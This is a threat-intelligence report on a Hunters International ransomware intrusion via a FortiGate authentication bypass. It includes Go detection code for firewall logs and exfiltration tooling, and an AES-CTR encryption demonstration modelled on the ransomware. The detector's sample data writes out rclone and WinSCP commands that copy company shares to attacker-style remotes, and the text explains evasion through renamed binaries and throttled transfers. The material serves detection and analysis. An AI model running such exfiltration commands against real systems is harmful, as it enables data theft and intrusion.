
In February 2025, the eSentire Threat Response Unit (TRU) uncovered a ransomware operation targeting a retail organization. This attack was attributed to Hunters International, a group that surfaced in mid-2023. The group reportedly acquired ransomware source code from Hive, operating independently with their own infrastructure.
Initial Access and Exploitation
The attackers gained entry by exploiting CVE-2024-55591, an authentication bypass in FortiOS and FortiProxy that yields super-admin privileges on the firewall. From the compromised FortiGate they set up VPN access into the network and used RDP to move deeper. They ran reconnaissance commands, created user accounts, and attempted data exfiltration with Rclone before switching to WinSCP.
Exploitation Details
Exploitation of CVE-2024-55591 was evident in the FortiGate event logs as activity from the jsconsole interface, where a new user "my_admin" was created. This account was used to set up a super-admin account and to add a firewall policy that granted broad access to internal resources. The attackers then reached a domain controller and ran typical reconnaissance commands.
- Key Point 1: Attackers exploited CVE-2024-55591 to gain initial access.
- Key Point 2: They used RDP and VPN for further network infiltration.
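One way to pull this sequence out of FortiGate event logs, as an added Go example that is not part of the eSentire report: it parses the FortiOS key="value" log format, keeps only events whose ui field is jsconsole (the GUI's CLI-console path, which is what the exploit reaches through the websocket; a jsconsole login whose srcip and dstip are identical or loopback is the indicator Fortinet published for this CVE), and flags the login, the system.admin add and the firewall.policy add. The log lines are constructed samples in FortiOS format: the timestamps, addresses and policy fields are invented, and only the "my_admin" account name comes from the report.

```go
package main

import (
	"fmt"
	"strings"
)

// FortiLog holds one FortiOS event log line parsed into its key=value fields.
type FortiLog map[string]string

// parseFortiLog splits a FortiOS syslog-style line into a map. Values are either
// bare tokens (srcip=127.0.0.1) or double-quoted and may then contain spaces.
func parseFortiLog(line string) FortiLog {
	out := FortiLog{}
	rest := strings.TrimSpace(line)
	for rest != "" {
		eq := strings.IndexByte(rest, '=')
		if eq < 0 {
			break
		}
		key, val := rest[:eq], ""
		rest = rest[eq+1:]
		if strings.HasPrefix(rest, `"`) {
			if end := strings.IndexByte(rest[1:], '"'); end >= 0 {
				val, rest = rest[1:1+end], rest[end+2:]
			} else {
				val, rest = rest[1:], ""
			}
		} else if sp := strings.IndexByte(rest, ' '); sp >= 0 {
			val, rest = rest[:sp], rest[sp+1:]
		} else {
			val, rest = rest, ""
		}
		out[key] = val
		rest = strings.TrimLeft(rest, " ")
	}
	return out
}

// Finding is one flagged event and the reason it matched.
type Finding struct {
	Reason string
	Log    FortiLog
}

// triageFortiLogs keeps only events made through the jsconsole interface and
// flags the admin login (noting a spoofed/loopback source, the published IoC),
// any admin account creation and any firewall policy addition made from it.
func triageFortiLogs(lines []string) []Finding {
	var findings []Finding
	for _, line := range lines {
		f := parseFortiLog(line)
		if !strings.HasPrefix(f["ui"], "jsconsole") {
			continue
		}
		switch {
		case f["logdesc"] == "Admin login successful":
			reason := "admin login via jsconsole as " + f["user"]
			if f["srcip"] == f["dstip"] || strings.HasPrefix(f["srcip"], "127.") {
				reason += " (spoofed/loopback source address)"
			}
			findings = append(findings, Finding{reason, f})
		case f["action"] == "Add" && f["cfgpath"] == "system.admin":
			findings = append(findings, Finding{"admin account created via jsconsole: " + f["cfgobj"] + " " + f["cfgattr"], f})
		case f["action"] == "Add" && f["cfgpath"] == "firewall.policy":
			findings = append(findings, Finding{"firewall policy added via jsconsole: " + f["cfgobj"] + " " + f["cfgattr"], f})
		}
	}
	return findings
}

// sampleFortiLogs is constructed sample data in the FortiOS log format; the
// timestamps, addresses and policy contents are invented for this example.
var sampleFortiLogs = []string{
	`date=2025-02-10 time=03:12:44 type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" user="admin" ui="ssh(203.0.113.5)" method="ssh" srcip=203.0.113.5 dstip=198.51.100.1 action="login" status="success" profile="super_admin" msg="Administrator admin logged in successfully from ssh(203.0.113.5)"`,
	`date=2025-02-10 time=03:15:01 type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" user="admin" ui="jsconsole" method="jsconsole" srcip=127.0.0.1 dstip=127.0.0.1 action="login" status="success" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"`,
	`date=2025-02-10 time=03:15:20 type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgpath="system.admin" cfgobj="my_admin" cfgattr="accprofile[super_admin]" msg="Add system.admin my_admin"`,
	`date=2025-02-10 time=03:16:02 type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="my_admin" ui="jsconsole(127.0.0.1)" action="Add" cfgpath="firewall.policy" cfgobj="99" cfgattr="srcintf[ssl.root]dstintf[internal]action[accept]" msg="Add firewall.policy 99"`,
}

func main() {
	for _, f := range triageFortiLogs(sampleFortiLogs) {
		fmt.Printf("%s %s  %s\n", f.Log["date"], f.Log["time"], f.Reason)
	}
}
```

Legitimate administrators do use the GUI's CLI console, so a jsconsole login on its own is a lead rather than a verdict; the loopback or self-referential srcip/dstip pair, followed within minutes by a new super_admin account and a policy opening the SSL VPN interface to the internal network, is the pattern to act on.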
Data Exfiltration and Ransomware Deployment
Hunters International used Rclone and WinSCP for data exfiltration. They first tried Rclone, passing arguments that skip files older than a cutoff and cap the transfer bandwidth (rclone's --max-age and --bwlimit options); throttling keeps a bulk copy from standing out in network traffic. After some failures they pivoted to WinSCP, downloading it from the official site and driving it with PowerShell scripts to automate the uploads.
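A process-creation triage for the two tools, as an added Go example that is not from the report. rclone is matched on the shape of its arguments (a copy/sync/move verb plus a remote:path destination) rather than on its file name, since the binary is routinely renamed, and the --max-age and --bwlimit options described above are extracted; WinSCP is matched when it is driven non-interactively (/script= or /command on winscp.com or winscp.exe) or when PowerShell loads its .NET assembly WinSCPnet.dll, which is how a PowerShell script automates uploads. The sample events are constructed: hosts, paths, the renamed rclone binary and the remote names are invented.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcEvent is a process-creation record (Sysmon event 1 / Security 4688)
// reduced to the fields this triage needs.
type ProcEvent struct{ Host, CommandLine string }

// ExfilHit is one process whose command line matches the tradecraft above.
type ExfilHit struct {
	Host, Tool, Dest string
	Flags            []string
}

// splitArgs tokenizes a Windows command line, honouring double quotes.
func splitArgs(cmd string) []string {
	var args []string
	var cur strings.Builder
	inQuote := false
	for _, r := range cmd {
		if r == '"' {
			inQuote = !inQuote
		} else if r == ' ' && !inQuote {
			if cur.Len() > 0 {
				args = append(args, cur.String())
				cur.Reset()
			}
		} else {
			cur.WriteRune(r)
		}
	}
	if cur.Len() > 0 {
		args = append(args, cur.String())
	}
	return args
}

// isRcloneRemote reports whether an argument names an rclone remote
// ("remote:path"); a Windows drive path such as C:\x has a one-letter prefix.
func isRcloneRemote(arg string) bool { return strings.IndexByte(arg, ':') > 1 }

// rcloneFlags shape a low-and-slow bulk copy: --max-age drops files older than
// a window, --bwlimit throttles, --transfers sets parallelism, --ignore-existing
// lets an interrupted copy resume.
var rcloneFlags = map[string]bool{"--max-age": true, "--bwlimit": true, "--transfers": true, "--ignore-existing": true}
var rcloneVerbs = map[string]bool{"copy": true, "sync": true, "move": true}

// triageProcEvents returns events that look like rclone or WinSCP exfiltration.
func triageProcEvents(events []ProcEvent) []ExfilHit {
	var hits []ExfilHit
	for _, ev := range events {
		args := splitArgs(ev.CommandLine)
		if len(args) < 2 {
			continue
		}
		exe := strings.ToLower(args[0])
		exe = exe[strings.LastIndexAny(exe, `\/`)+1:]
		lower := strings.ToLower(ev.CommandLine)
		hit := ExfilHit{Host: ev.Host}
		switch {
		case rcloneVerbs[strings.ToLower(args[1])]: // rclone by argument shape, not image name
			for _, a := range args[2:] {
				if name := strings.SplitN(a, "=", 2)[0]; rcloneFlags[name] {
					hit.Flags = append(hit.Flags, name)
				} else if !strings.HasPrefix(a, "-") && isRcloneRemote(a) {
					hit.Dest = a
				}
			}
			if hit.Dest == "" {
				continue // a verb alone is too weak; require a remote target
			}
			hit.Tool = "rclone"
		case strings.HasPrefix(exe, "winscp") && (strings.Contains(lower, "/script=") || strings.Contains(lower, "/command")):
			hit.Tool = "winscp-scripted"
		case strings.HasPrefix(exe, "powershell") && strings.Contains(lower, "winscpnet.dll"):
			hit.Tool = "winscp-dotnet-from-powershell"
		default:
			continue
		}
		for _, a := range args { // pull an sftp:// target out of a WinSCP "open" command
			if i := strings.Index(strings.ToLower(a), "sftp://"); i >= 0 {
				hit.Dest = a[i:]
			}
		}
		hits = append(hits, hit)
	}
	return hits
}

// sampleEvents is constructed sample data; hosts, paths, the renamed rclone
// binary and the remote names are invented for this example.
var sampleEvents = []ProcEvent{
	{"FS01", `C:\Windows\System32\svchost.exe -k netsvcs -p`},
	{"FS01", `C:\Windows\Temp\svchost.exe copy E:\Shares\Finance mega:exfil/finance --max-age 2y --bwlimit 8M --transfers 8 -q`},
	{"FS01", `"C:\Program Files (x86)\WinSCP\WinSCP.com" /ini=nul /log=C:\Windows\Temp\w.log /command "open sftp://u:p@203.0.113.50/" "put E:\Shares\HR\* /in/" "exit"`},
	{"DC01", `powershell.exe -NoProfile -c "Add-Type -Path 'C:\Windows\Temp\WinSCPnet.dll'; . C:\Windows\Temp\up.ps1"`},
}

func main() {
	for _, h := range triageProcEvents(sampleEvents) {
		fmt.Printf("%s %-30s dest=%s flags=%v\n", h.Host, h.Tool, h.Dest, h.Flags)
	}
}
```

The second sample line is the case that defeats image-name rules: rclone renamed to svchost.exe and run from a temp directory. The verb plus remote destination still gives it away, and the presence of --bwlimit on a first-seen binary is a strong hint that someone wants the copy to be slow and quiet.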
Ransomware Execution
The group attempted to deploy the "encrypter_windows_x64.exe" ransomware, which was detected and quarantined. They then switched to a DLL version, "encrypter_windows_x64.dll". This ransomware, written in Rust, does not leave ransom notes or append extensions to encrypted files.
- Key Point 1: Rclone and WinSCP were used for data exfiltration.
- Key Point 2: The ransomware was deployed using a DLL version after initial detection.
Technical Analysis of Ransomware
The ransomware encrypts files with AES-256 in CTR mode, using multiple threads. For the encryption it generates a buffer holding a 32-byte key and a 16-byte initial counter. It also uses Service Control Manager APIs to stop services, and terminates processes, according to lists passed on the command line.
Encryption Process
In CTR mode the cipher never encrypts the plaintext directly: AES-256 encrypts successive values of the 16-byte counter block to produce a keystream, and the file bytes are XORed with that keystream. Decryption is the same XOR with the same keystream, so anyone holding the key and initial counter can reverse it. The ransomware skips certain directories, files and file extensions during encryption so that the system remains stable.
- Key Point 1: AES-256 CTR is used for file encryption.
- Key Point 2: Specific directories and files are excluded from encryption.
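The CTR construction just described, as an added example in Go that is not from the page or from the ransomware itself. It encrypts several in-memory files in parallel, each with a freshly generated 48-byte buffer split into a 32-byte key and a 16-byte counter, then rebuilds the keystream by hand (AES of the incrementing counter) to show that the standard library's output is exactly plaintext XOR keystream and that applying the same operation again decrypts. The file contents are constructed samples; how the real sample protects or exports its key material, and its skip lists, are not on the page and are not modelled here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
	"sync"
)

// FileKeyMaterial mirrors the per-file buffer the text describes: a 32-byte
// AES-256 key followed by a 16-byte initial counter block.
type FileKeyMaterial struct {
	Key     [32]byte
	Counter [16]byte
}

// ctrKeystream builds n bytes of keystream by hand: block i is AES_K(counter+i),
// the counter treated as a 128-bit big-endian integer (Go's cipher.NewCTR convention).
func ctrKeystream(key []byte, counter [16]byte, n int) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, 0, n+aes.BlockSize)
	for len(out) < n {
		var ks [aes.BlockSize]byte
		block.Encrypt(ks[:], counter[:])
		out = append(out, ks[:]...)
		for i := len(counter) - 1; i >= 0; i-- { // increment with carry
			if counter[i]++; counter[i] != 0 {
				break
			}
		}
	}
	return out[:n], nil
}

// xorBytes returns a XOR b; in CTR mode this one operation is both encryption
// and decryption, which is why reusing a key/counter pair across files is fatal.
func xorBytes(a, b []byte) []byte {
	out := make([]byte, len(a))
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// encryptCTR runs AES-256-CTR from the standard library over one file's bytes.
// Calling it again on the ciphertext with the same material decrypts.
func encryptCTR(m FileKeyMaterial, data []byte) ([]byte, error) {
	block, err := aes.NewCipher(m.Key[:])
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(data))
	cipher.NewCTR(block, m.Counter[:]).XORKeyStream(out, data)
	return out, nil
}

// encryptFilesParallel encrypts each in-memory "file" in its own goroutine with
// fresh key material, as the multi-threaded encryptor does; results keep input order.
func encryptFilesParallel(files [][]byte) ([][]byte, []FileKeyMaterial, error) {
	cts := make([][]byte, len(files))
	mats := make([]FileKeyMaterial, len(files))
	errs := make([]error, len(files))
	var wg sync.WaitGroup
	for i := range files {
		wg.Add(1)
		go func(i int) {
			defer wg.Done()
			var buf [48]byte // 32-byte key || 16-byte initial counter, as in the text
			if _, errs[i] = rand.Read(buf[:]); errs[i] != nil {
				return
			}
			copy(mats[i].Key[:], buf[:32])
			copy(mats[i].Counter[:], buf[32:])
			cts[i], errs[i] = encryptCTR(mats[i], files[i])
		}(i)
	}
	wg.Wait()
	for _, err := range errs {
		if err != nil {
			return nil, nil, err
		}
	}
	return cts, mats, nil
}

func main() {
	files := [][]byte{[]byte("constructed sample: Q1 ledger"), []byte("constructed sample: HR roster")}
	cts, mats, err := encryptFilesParallel(files)
	if err != nil {
		panic(err)
	}
	for i, ct := range cts {
		ks, _ := ctrKeystream(mats[i].Key[:], mats[i].Counter, len(ct))
		fmt.Printf("file %d: ct=%x manual-keystream-matches=%v\n", i, ct, bytes.Equal(xorBytes(files[i], ks), ct))
	}
}
```

Two things to check when analysing a CTR-based encryptor: that key material really is fresh per file (if a key/counter pair is reused, XORing two ciphertexts cancels the keystream and leaves the XOR of the two plaintexts, which is often enough to recover both), and that the counter is incremented across the full 16-byte block rather than only its low bytes, since a narrow counter wraps and repeats keystream within a large file.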